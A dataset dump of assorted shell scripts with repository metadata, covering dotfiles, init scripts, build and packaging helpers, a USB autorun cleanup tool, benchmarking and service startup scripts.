/vfix
|
UTF-8
| 484
| 3.09375
| 3
|
[
"WTFPL"
] |
permissive
|
#!/bin/bash
function fix {
rec='RECYCLER'
if [ -d "$1/$rec" ]; then
rm -rf "$1/$rec"
elif [ -d "$rec" ]; then
rm -rf "$rec"
fi
is_ntfs=`findmnt -T $1 | grep fuseblk`
if [ "$is_ntfs" ]; then
find $1 -type d -exec setfattr -h -v 0x00000000 -n system.ntfs_attrib_be {} \;
else
find $1 -type d -exec fatattr -h -s {} \;
fi
find $1 -type f -name "*.lnk" -exec rm -f {} \;
find $1 -type f -iname "autorun.inf" -exec rm -f {} \;
}
if [ $1 ]; then
fix $1
else
fix ./
fi
| true
|
f602ac693e67bce60338af326dd27725e2f5a694
|
Shell
|
openbsd/src
|
/regress/sys/ffs/tests/unlink/04.t
|
UTF-8
| 298
| 2.703125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
# $FreeBSD: src/tools/regression/fstest/tests/unlink/04.t,v 1.1 2007/01/17 01:42:12 pjd Exp $
desc="unlink returns ENOENT if the named file does not exist"
n0=`namegen`
n1=`namegen`
expect 0 create ${n0} 0644
expect 0 unlink ${n0}
expect ENOENT unlink ${n0}
expect ENOENT unlink ${n1}
| true
|
b96bae0d6020c43d60ce1a2d67b00a037064775e
|
Shell
|
utgwkk/dotfiles
|
/files/.zshrc
|
UTF-8
| 2,023
| 2.65625
| 3
|
[] |
no_license
|
# vim:set ft=zsh :
fpath=(~/zsh/functions/*(N-/) $fpath)
autoload -U colors && colors
autoload -Uz compinit
compinit
setopt auto_pushd
setopt pushd_ignore_dups
setopt hist_ignore_space
setopt share_history
HISTFILE=~/.zsh_history
HISTSIZE=1000000
SAVEHIST=1000000
# Do not record a mistyped command on .zsh_history
# see also: http://www.zsh.org/mla/users/2014/msg00715.html
zshaddhistory() { whence ${${(z)1}[1]} >/dev/null || return 2 }
setopt print_eight_bit
setopt no_beep
setopt no_flow_control
setopt ignore_eof
setopt interactive_comments
setopt auto_cd
setopt share_history
setopt hist_ignore_all_dups
setopt extended_glob
setopt PROMPT_SUBST
source ~/local/etc/git-prompt.sh
PS1="%{${fg[green]}%}[%n@%m]%{${fg[red]}%} %(?..[%?] )%{${fg[cyan]}%}\$(date +%H:%M:%S)%{${fg[yellow]}%}\$(__git_ps1)%{${reset_color}%} %~
% %{${fg[red]}%}%%%{${reset_color}%} "
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}'
GIT_PS1_SHOWDIRTYSTATE=true
GIT_PS1_SHOWUNTRACKEDFILES=true
GIT_PS1_SHOWSTASHSTATE=true
GIT_PS1_SHOWUPSTREAM=auto
source ~/.aliases
export LESS='-i -M -R -W'
export PAGER=less
export LESS_TERMCAP_mb=$'\E[01;31m' # Begins blinking.
export LESS_TERMCAP_md=$'\E[01;31m' # Begins bold.
export LESS_TERMCAP_me=$'\E[0m' # Ends mode.
export LESS_TERMCAP_se=$'\E[0m' # Ends standout-mode.
export LESS_TERMCAP_so=$'\E[00;47;30m' # Begins standout-mode.
export LESS_TERMCAP_ue=$'\E[0m' # Ends underline.
export LESS_TERMCAP_us=$'\E[01;32m' # Begins underline.
export PATH=/usr/local/bin:$HOME/local/bin:$PATH
if [ test `which peco > /dev/null 2>&1` ] && [ test `which tac > /dev/null 2>&1` ] && [ test `which awk > /dev/null 2>&1` ]; then
function peco-history-selection() {
BUFFER=`history -n 1 | tac | awk '!a[$0]++' | peco | sed -e 's/\\\\n/\n/g'`
CURSOR=$#BUFFER
zle reset-prompt
}
zle -N peco-history-selection
bindkey '^R' peco-history-selection
fi
# apply local .zshrc
if [ -f ~/.zshrc.local ]; then
source ~/.zshrc.local
fi
| true
|
e951eb8901c90e524a453111098d0039704bd47b
|
Shell
|
vikigenius/voidwoken
|
/dotfiles/local/dotbin/rofi/powermenu
|
UTF-8
| 580
| 3.421875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Bash required for echo -e shenanigans !
rofi_command="rofi -theme theme/powermenu.rasi"
### Options ###
power_off=" Shutdown"
reboot=" Reboot"
lock=" Lock"
log_out=" Logout"
# Variable passed to rofi
options="$power_off\n$reboot\n$lock\n$log_out"
menu_choice=$(echo -e "$options" | $rofi_command -dmenu)
case $menu_choice in
$power_off)
loginctl poweroff
;;
$reboot)
loginctl reboot
;;
$lock)
light-locker-command -l
;;
$log_out)
bspc quit
;;
esac
| true
|
55cba6b7e1b8c9b10c12f82fc5f66889181e491b
|
Shell
|
jturcino/glycresoft-qsub-templates
|
/templates/preprocess-mzml.qsub.tmpl
|
UTF-8
| 1,350
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
#$ -S /bin/bash
#$ -cwd
#$ -N preprocess-mzml-{{dataset}}-{{sample_id}}
#$ -j y
#$ -o preprocess-mzml-{{dataset}}-{{sample_id}}.qlog
#$ -P glyco-ms
#$ -V
{{email}}
echo "=========================================================="
echo "Starting on : $(date)"
echo "Running on node : $(hostname)"
echo "Current directory : $(pwd)"
echo "Current job ID : $JOB_ID"
echo "Current job name : $JOB_NAME"
echo "Task index number : $SGE_TASK_ID"
echo "=========================================================="
source ~/.bashrc
scratchdir=`scratch dir -d preprocess-mzml-{{dataset}}-{{sample_id}}`
mzml_file=`scratch push -d $scratchdir "{{unprocessed_mzml_file}}"`
out_file=`scratch push -d $scratchdir "{{sample_id}}.preprocessed.mzML"`
# unzip if compressed
extension="${mzml_file##*.}"
if [ "$extension" == "gz" ]; then
echo "Unzipping $mzml_file"
gunzip $mzml_file
mzml_file="${mzml_file%.gz}"
fi
# run glycresoft-cli preprocessing and remove original mzML file
glycresoft-cli mzml preprocess -p 6 -m 3 -a glycopeptide -s {{start_time}} -e {{end_time}} -an peptide $mzml_file $out_file
rm "$mzml_file"
# copy everything over
echo "Fetching finished files"
outdir="preprocess"
mkdir -p "$outdir"
cp $out_file "$outdir"/"{{sample_id}}".preprocessed.mzML
cp ${out_file}-idx.json "$outdir"/"{{sample_id}}".preprocessed.mzML-idx.json
| true
|
34082a9a22b811a63c2c32cb71824430defc2399
|
Shell
|
dellelce/mkit
|
/modules/xdamage/build.sh
|
UTF-8
| 157
| 2.65625
| 3
|
[] |
no_license
|
build_xdamage()
{
[ -d "${prefix}/lib/pkgconfig" ] && export PKG_CONFIG_PATH="${prefix}/lib/pkgconfig"; build_gnuconf xdamage $srcdir_xdamage
return $?
}
| true
|
68a733ad12cbb037eaac67bbe1ce6e88cbde6668
|
Shell
|
edvaldo-lima/extract_urls
|
/extract_urls_parser.sh
|
UTF-8
| 2,173
| 4.09375
| 4
|
[
"CC0-1.0"
] |
permissive
|
#!/usr/bin/env bash
#
# extract_urls.sh - Extracts URLs from a website.
#
# Autor: Edvaldo Lima
# Manutenção: Edvaldo Lima
#
# ------------------------------------------------------------------------ #
# Extracts URLs from a website https://www.ted.com/talks
#
# Exemplos:
# $ ./extract_urls.sh
# On this example the program webscrape the website and return only the
# URLs of the talks.
# ------------------------------------------------------------------------ #
# Histórico:
#
# v1.0 11/13/2020, Edvaldo:
# - Built a regex to webscrape the page and extract only urls of talks.
# v1.0 11/13/2020, Edvaldo:
# - Colored the urls extacted.
# v1.1 11/17/2020, Edvaldo:
# - Using configuration file (conf.cf) to pass parameters dinamically.
# - Using parser.sh to parse the conf.cf file used by ./extract_urls.sh.
# ------------------------------------------------------------------------ #
# Testado em:
# bash 5.0.17
# ------------------------------------------------------------------------ #
#
# ------------------------------- VARIÁVEIS -------------------------------#
CONFIGURATION_FILE="conf.cf"
USE_UPPERCASE=
USE_COLORS=
TED_URLS="ted_urls.txt"
VERDE="\033[32;1;1m"
eval $(./parser.sh $CONFIGURATION_FILE)
[ "$(echo $CONF_USE_UPPERCASE)" = "1" ] && USE_UPPERCASE="1"
[ "$(echo $CONF_USE_COLORS)" = "1" ] && USE_COLORS="1"
# ------------------------------------------------------------------------ #
# ------------------------------- EXECUÇÃO ------------------------------------#
for i in {1..10} # loop through first 10 pages and save results to a file.
do
lynx -source "https://www.ted.com/talks?language=en&page=$i&sort=popular" |
grep "href='/talks/" |
sed "s/^.*href='/https\:\/\/www\.ted\.com/;s/?.*$/\/transcript/" |
uniq
done > ted_urls.txt
while read -r ted_urls # Read the text file and displays the urls in green on the screen
do
[ "$USE_UPPERCASE" = "1" ] && MESSAGE="$(echo ${ted_urls} | tr a-z A-Z)"
[ ! "$USE_UPPERCASE" = "1" ] && MESSAGE="$(echo ${ted_urls})"
[ "$USE_COLORS" = "1" ] && MESSAGE="$(echo -e ${VERDE}$MESSAGE)"
echo -e "$MESSAGE"
done < "$TED_URLS"
| true
|
5029bde2c60ef0cf2ee352f866f6f7f00a922a8a
|
Shell
|
funkyproject/heroku-buildpack-php
|
/support/package_icu
|
UTF-8
| 916
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
set -o pipefail
download_url="http://download.icu-project.org/files/icu4c/51.2/icu4c-51_2-src.tgz"
basedir="$( cd -P "$( dirname "$0" )" && pwd )"
source "$basedir/../conf/buildpack.conf"
export PATH=${basedir}/../vendor/bin:$PATH
if [ -z "$S3_BUCKET" ]; then
echo "Must set S3_BUCKET environment variable" >&2
exit 1
fi
tempdir="$( mktemp -t libicu_XXXX )"
rm -rf $tempdir
mkdir -p $tempdir
cd $tempdir
echo "-----> Downloading libicu"
curl -L "$download_url" | tar xzv
echo "-----> Compiling"
mkdir -p /app/vendor/libicu
cd icu
./source/runConfigureICU Linux --prefix=/app/vendor/libicu
make
make install
echo "-----> Building the archive"
pushd /app/vendor/libicu
tar czf "${tempdir}/libicu-51.tgz" *
popd
s3cmd put \
--verbose --acl-public \
"$tempdir/libicu-51.tgz" \
"s3://$S3_BUCKET/package/libicu-51.tgz"
"$basedir/package-checksum" "libicu-51"
| true
|
297d476a626ad23a7277d464ead22e01082cf7f7
|
Shell
|
essentialkaos/bash-parsers
|
/prefs-parser.sh
|
UTF-8
| 647
| 3.359375
| 3
|
[
"Apache-2.0"
] |
permissive
|
SUPPORTED_OPTS=""
PREFS_FILE=""
## PREFS PARSING ###############################################################
unset arg argn argp
PREFS_FILE=${PREFS_FILE//\~/$HOME}
if [[ -n "$PREFS_FILE" && -r "$PREFS_FILE" ]] ; then
while read -r arg ; do
[[ -z "$arg" || "$arg" =~ ^\# || "$arg" =~ ^\ +$ ]] && continue
arg="${arg/: /:}" ; argn="${arg%%:*}" ; argn="${argn//-/_}"
argp="${arg#*:}" ; argp="${argp/\~/$HOME}"
[[ "$SUPPORTED_OPTS " =~ $argn\ && -n "$argp" ]] && declare "$argn=$argp"
done < <(awk 1 "$PREFS_FILE")
unset arg argn argp
fi
################################################################################
| true
|
b49e88fd29744c038dfc56acc956098e484733f0
|
Shell
|
jdevera/leb
|
/modules/pipx_packages.sh
|
UTF-8
| 894
| 3.625
| 4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# vim: set fdm=marker :
MODULE_NAME='Pipx Packages'
# Functions {{{
function pipx_is_installed()
{
local package=$1
# Resolve first time and let it leak
[[ -z $_PIPX_VENV_DIR ]] &&
_PIPX_VENV_DIR=$(pipx list | sed -n 's/venvs are in //p')
is_dir "$_PIPX_VENV_DIR/$package"
}
function module_pipx_packages()
{
local packages="$@"
log_module_start
reload_rc
program_is_available pipx ||
log_fatal "Could not find pipx"
local INST=''
for pkg in $packages
do
pipx_is_installed "$pkg" || INST="$INST $pkg"
done
[[ -z $INST ]] && log_no_changes
log_info "Installing pip packages with pipx: $INST"
for pkg in $INST
do
pipx install "$pkg" || log_error "Problem (pipx-)installing python package : $pkg"
done
log_module_end
}
# }}}
module_pipx_packages \
pygments \
colout2 \
;
| true
|
56561e5f4ced62ccec903c863eb88f73bbdd8915
|
Shell
|
17316781969/test_fab
|
/expect_scp.sh
|
UTF-8
| 633
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/expect -f
set src_file [lindex $argv 0]
set dest_file [lindex $argv 1]
set timeout 3
for {set i 1} {$i<=12} {incr i} {
spawn scp $src_file c@192.168.2.[expr {$i + 100}]:$dest_file
expect { -re "*(yes/no)?*" {send "yes\r"}}
expect {
-re ".*assword*." {
send "${password}\r" ;# why do you use ``\r\r''?
exp_continue
} "100%" {
puts "File Transfer successful\n"
set success1 0.5
exp_continue
} -re {[0-9]{1,2}%} {
exp_continue
} timeout {
set success2 0
set success1 0
} -re ".*closed by remote host" {
set success2 0.5
}
}
}
| true
|
8ac72d568b8d9526ea88262e727593df594d9a55
|
Shell
|
kawataku8/ft_service
|
/srcs/wordpress/srcs/start.sh
|
UTF-8
| 599
| 2.75
| 3
|
[] |
no_license
|
#!/bin/sh
rc-status
rc-service php-fpm7 start
/telegraf-1.17.2/usr/bin/telegraf --config /etc/telegraf/telegraf.conf &
cd /www/wordpress
wp core install \
--url=https://192.168.49.50:5050 \
--title=FTSERVICES_BLOG \
--admin_user=admin \
--admin_password=admin \
--admin_email=wpadmin@example.com
# if mysql doesn't started yet, last command would fail
cmd_res=$?
if [ $cmd_res -ne 0 ]; then
echo "mysql doesnt started yet"
return 1;
fi
wp user create bob bob@b.com \
--role=author \
--user_pass=bob
wp user create john john@j.com \
--role=author \
--user_pass=john
nginx
sleep infinity
| true
|
5220820c628bd3883471758d91a514f065b3ce24
|
Shell
|
dgleba/vamp206a
|
/bin1/metabase_stop1.sh
|
UTF-8
| 316
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Grabs and kill a process from the pidlist that has the word metabase.jar
pid=`ps aux | grep metabase.jar | awk '{print $2}'`
kill -9 $pid
set -vx
mv /home/albe/log/metabasebi.log /home/albe/log/metabasebi$(date +"__%Y.%m.%d_%H.%M.%S").log
set +vx
echo
echo Completed running metabase_stop1.sh.
echo
| true
|
62a5d19d8cc52592c550ceefc2b7c96b6b21c26a
|
Shell
|
zhgwenming/appstack
|
/cbase/moxi/moxi-1.8.0_8_g52a5fa8/scripts/moxi-init.rhat.in
|
UTF-8
| 1,584
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/sh
#
# chkconfig: - 55 45
# description: The moxi is a memchached proxy
# processname: moxi
# config: /etc/sysconfig/moxi
# Source function library.
. /etc/rc.d/init.d/functions
USER=nobody
MAXCONN=1024
CPROXY_ARG=/etc/moxi.conf
OPTIONS=""
if [ -f /etc/sysconfig/moxi ];then
. /etc/sysconfig/moxi
fi
# Check that networking is up.
if [ "$NETWORKING" = "no" ]
then
exit 0
fi
# if CPROXY_ARG is a config file reference check it's existance
if ([[ "/" < "$CPROXY_ARG" ]] && [[ "$CPROXY_ARG" < "0" ]]) || ([[ "." < "$CPROXY_ARG" ]] && [[ "$CPROXY_ARG" < "/" ]]); then
if [ ! -f "$CPROXY_ARG" ]; then
echo "Misconfiguration! '$CPROXY_ARG' is absent. See /usr/share/doc/moxi-%{version}/examples/ for configuration examples. Aborting."
exit 1
fi
fi
RETVAL=0
prog="moxi"
start () {
echo -n $"Starting $prog: "
# insure that /var/run/moxi has proper permissions
chown $USER /var/run/moxi
daemon /usr/bin/moxi -d -u $USER -c $MAXCONN -z $CPROXY_ARG -P /var/run/moxi/moxi.pid $OPTIONS
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/moxi
}
stop () {
echo -n $"Stopping $prog: "
killproc moxi
RETVAL=$?
echo
if [ $RETVAL -eq 0 ] ; then
rm -f /var/lock/subsys/moxi
rm -f /var/run/moxi.pid
fi
}
restart () {
stop
start
}
# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status moxi
;;
restart|reload)
restart
;;
condrestart)
[ -f /var/lock/subsys/moxi ] && restart || :
;;
*)
echo $"Usage: $0 {start|stop|status|restart|reload|condrestart}"
exit 1
esac
exit $?
| true
|
4b45fad5ecaf46d9469e6e46984fb71b74fe9f2a
|
Shell
|
zirui-HIT/transition-amr-parser
|
/tests/minimal_test.sh
|
UTF-8
| 346
| 2.546875
| 3
|
[
"Apache-2.0"
] |
permissive
|
set -o errexit
set -o pipefail
set -o nounset
# Delete previous runs is exist
rm -Rf DATA/wiki25/*
# simulate completed corpora extraction and alignment
bash tests/create_wiki25_mockup.sh
# Run local test
bash run/run_experiment.sh configs/wiki25-structured-bart-base-sep-voc.sh
# If we get here we passed
printf "[\033[92mOK\033[0m] $0\n"
| true
|
7d1a649e6b6a74b8dae41e5e0f187fa20dddfc79
|
Shell
|
dfguan/fuzzy
|
/aces_out_var.bash
|
UTF-8
| 193
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#Author : Dengfeng Guan
#Purpose : function can access outside variable
test() {
echo $dir # can access $dir; NB: doesn't work with bsub
}
export -f test
if [ "$#" -gt 0 ]
then
dir=$1
test
fi
| true
|
80f3a3c13cd93f3d5b6b1c1b21d2319fb0f61b1c
|
Shell
|
nickvonklemp/Bash-Scripts
|
/iperf3/sperf.sh
|
UTF-8
| 3,568
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
function scale {
input=$1
if [ $input -le 2000 ] && [ $input -ge 100 ]; then
input=$(echo $input/1000|bc -l)
#input=$input/1000
fi
return "$input"
}
function wait_text {
local pane="$1"
local text="$2"
while :; do
tmux capture-pane -t "$pane" -p | grep "$text" > /dev/null && return 0
sleep 0.25
done
return -1
}
touch output.csv
ip=$1
s=$2
session=nick
window=${session}:0
pane=${window}.4
tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 1 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $7 }')"
echo "$OUTPUT"
OUTPUT=$(scale "$OUTPUT")
STRING="$s,1,$OUTPUT"
echo "$STRING" >> output.csv
echo "$STRING"
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 2 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,2,$OUTPUT"
echo "$STRING"
echo "$STRING" >> output.csv
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
sleep 1
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 4 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,4,$OUTPUT"
echo "$STRING" >> output.csv
echo "$STRING"
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
sleep 1
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 8 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,8,$OUTPUT"
echo "$STRING" >> output.csv
echo "$STRING"
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
sleep 1
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 16 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,16,$OUTPUT"
echo "$STRING" >> output.csv
echo "$STRING"
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 32 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,32,$OUTPUT"
echo "$STRING" >> output.csv
echo "$STRING"
sleep 1
pane=${window}.4
#tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1
pane=${window}.2
sleep 1
tmux send-keys -t "$pane" C-z "clear" Enter
sleep 1
tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P 64 -M $s" Enter
sleep 2
wait_text $pane "iperf Done."
OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
STRING="$s,64,$OUTPUT"
echo "$STRING" >> output.csv
#read -p "wait"
pane=${window}.4
tmux send-keys -t "$pane" C-z "pkill -9 iperf3" Enter
sleep 1
| true
|
9a0766242ee1c5e5ef60a83c3b0ea24c7a118862
|
Shell
|
alleny77746/McBlooms
|
/config_old/recipes/templates/rbenv_installer.sh.erb
|
UTF-8
| 976
| 3.734375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Sourced from: https://github.com/rinrinne/install-shared-rbenv
set -e
[ ! -z $RBENV_ROOT ] || RBENV_ROOT=<%= rbenv_root %>
echo Install rbenv to $RBENV_ROOT...
if [ -d $RBENV_ROOT ]; then
echo rbenv is already installed. So updating...
cd $RBENV_ROOT
git pull
else
mkdir -p $RBENV_ROOT
cd $RBENV_ROOT
git clone https://github.com/sstephenson/rbenv.git .
fi
# Install plugins:
PLUGINS=(
sstephenson/rbenv-vars
sstephenson/ruby-build
sstephenson/rbenv-default-gems
fesplugas/rbenv-installer
fesplugas/rbenv-bootstrap
rkh/rbenv-update
rkh/rbenv-whatis
rkh/rbenv-use
)
for plugin in ${PLUGINS[@]} ; do
KEY=${plugin%%/*}
VALUE=${plugin#*/}
RBENV_PLUGIN_ROOT="${RBENV_ROOT}/plugins/$VALUE"
if [ ! -d "$RBENV_PLUGIN_ROOT" ] ; then
git clone https://github.com/$KEY/$VALUE.git $RBENV_PLUGIN_ROOT
else
cd $RBENV_PLUGIN_ROOT
echo "Pulling $VALUE updates."
git pull
fi
done
chmod a+w $RBENV_ROOT -R
| true
|
80d128468f57051a7e7a96c7e79f5abd76d289b5
|
Shell
|
sbeliakou/kat-example
|
/k8s-practice-course/k8s-volumes/foreground.sh
|
UTF-8
| 487
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
clear && echo -n "Prepairing kubelet" &&
until $(kubelet --version >/dev/null 2>&1); do echo -n .; sleep 1; done; echo "\nWaiting for master to join" &&
until $(kubectl get componentstatus > /dev/null 2>&1); do echo -n .; sleep 1; done; echo "\nWaiting for master to get ready" &&
while $([ `kubectl get node master -o jsonpath='{.status.conditions[?(@.type=="Ready")].status}'` == "False" ]); do echo -n .; sleep 1; done; echo; history -c; clear; echo "Time to rock!"
| true
|
cc2451e896c36f48a23e33c2e4a04c287f5ae260
|
Shell
|
whostolebenfrog/mr-clojure
|
/src/leiningen/new/mr_clojure/preremove.sh
|
UTF-8
| 1,025
| 3.546875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
/bin/echo "preremove script started [$1]"
APP_NAME={{lower-name}}
prefixDir=/usr/local/$APP_NAME
identifier=$APP_NAME.jar
isJettyRunning=`pgrep java -lf | grep $identifier | cut -d" " -f1 | /usr/bin/wc -l`
if [ $isJettyRunning -eq 0 ]
then
/bin/echo "{{upper-name}} is not running"
else
sleepCounter=0
sleepIncrement=2
waitTimeOut=600
/bin/echo "Timeout is $waitTimeOut seconds"
/bin/echo "{{upper-name}} is running, stopping service"
/sbin/service $APP_NAME stop &
myPid=$!
until [ `pgrep java -lf | grep $identifier | cut -d" " -f1 | /usr/bin/wc -l` -eq 0 ]
do
if [ $sleepCounter -ge $waitTimeOut ]
then
/usr/bin/pkill -KILL -f '$identifier'
/bin/echo "Killed {{upper-name}}"
break
fi
sleep $sleepIncrement
sleepCounter=$(($sleepCounter + $sleepIncrement))
done
wait $myPid
/bin/echo "{{upper-name}} down"
fi
if [ "$1" = 0 ]
then
/sbin/chkconfig --del $APP_NAME
else
/sbin/chkconfig --list $APP_NAME
fi
/bin/echo "preremove script finished"
exit 0
| true
|
ab5435a8c21b49fc508ef34e61e1ccd4a0d24b8b
|
Shell
|
gwu-libraries/sfm-elk
|
/docker/logstash/start.sh
|
UTF-8
| 947
| 3.015625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# STEP-0 Initial install for sfm
gosu root /opt/sfm-setup/setup_reqs.sh
# STEP-1 Waiting for elasticsearch, mq kibana
echo "Waiting for elasticsearch, mq and kibana"
appdeps.py --port-wait mq:5672 --port-wait elasticsearch:9200 --port-wait kibana:5601 --wait-secs $WAIT_SECS
if [ "$?" = "1" ]; then
echo "Problem with application dependencies."
exit 1
fi
# STEP-2 Check whether elasticsearch status is not red, if it's red wait 30 seconds to try again
curl -s -XGET elasticsearch:9200/_cluster/health | grep "\"status\":\"red\"" 2>/dev/null 1>/dev/null
until [ $? -eq 1 ]; do
echo "elasticsearch status is red, wait 30 seconds to try again."
sleep 30
curl -s -XGET elasticsearch:9200/_cluster/health | grep "\"status\":\"red\"" 2>/dev/null 1>/dev/null
done
# STEP-3 running the logstash
gosu logstash python sfm_elk_loader.py mq $RABBITMQ_USER $RABBITMQ_PASSWORD elk_loader_$HOSTNAME --debug=$DEBUG $* &
wait
| true
|
96a5345f43809350574d83fc851deb5e0cb303d9
|
Shell
|
FunTimeCoding/vagrant-salt
|
/up-box.sh
|
UTF-8
| 449
| 3.75
| 4
|
[] |
no_license
|
#!/bin/sh -e
BOX_NAME="${1}"
if [ "${BOX_NAME}" = "" ]; then
echo "Usage: BOX_NAME"
exit 1
fi
SCRIPT_DIRECTORY=$(dirname "${0}")
if [ ! -d "${SCRIPT_DIRECTORY}/box/${BOX_NAME}" ]; then
echo "Box not found."
exit 1
fi
cd "${SCRIPT_DIRECTORY}/box/${BOX_NAME}"
vagrant up
sleep 10
SYSTEM=$(uname)
if [ "${SYSTEM}" = Darwin ]; then
salt-key --yes --accept "${BOX_NAME}"
else
sudo salt-key --yes --accept "${BOX_NAME}"
fi
| true
|
cd6e797d64d3c684adc57ad327baa71369110732
|
Shell
|
esstorm/codechecker-docker
|
/codechecker/init.sh
|
UTF-8
| 594
| 2.765625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
export PATH=$PATH:/home/casper/codechecker/build/CodeChecker/bin
. /home/casper/codechecker/venv/bin/activate
# Wait for up to 300 secs
echo '=> Waiting for postgres container to be available'
/wait-for-it.sh -t 300 db:5432
echo '=> Postgres is available!'
CodeChecker server --postgresql --not-host-only \
--db-host db --db-port 5432 \
--db-username codechecker --db-name codechecker_config &
CodeChecker cmd products add Default --name "Default Product" \
--postgresql \
--db-host db --db-port 5432 \
--db-username codechecker --db-name default_product
| true
|
874a469ac521102a86832c93b48f56bd27c61210
|
Shell
|
crgove/ejercicios-_practica_shell_script
|
/practica9.sh
|
UTF-8
| 101
| 2.953125
| 3
|
[] |
no_license
|
valor=0
for(( i=0; i<20; i++ )); do
valor=$((valor+5))
echo "Los valores son $valor"
done
| true
|
d64cf752e54b80d2aed382bf5d3583e8cd495075
|
Shell
|
nma-io/alienvault_tools
|
/correlation_fix.sh
|
UTF-8
| 681
| 2.875
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Fix that pesky correlation issue where
# alerts can never be closed/worked.
# Cron? One off? Depending on your frequency needs
# Nicholas Albright (@nma_io)
HOST=`grep ^db_ip= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d'`
USER=`grep ^user= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d'`
PASS=`grep ^pass= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d'`
DB='alienvault'
now=`date +%s`
calc=$((now - 500))
offset="$(date -d @$calc -u +'%Y-%m-%d %H:%M:%S')"
sshpass -p $PASS mysql --default-character-set=utf8 -A -u $USER -h $HOST $DB -p -e "update alarm set removable=1 where status='open' and removable = 0 and timestamp < '$offset';"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.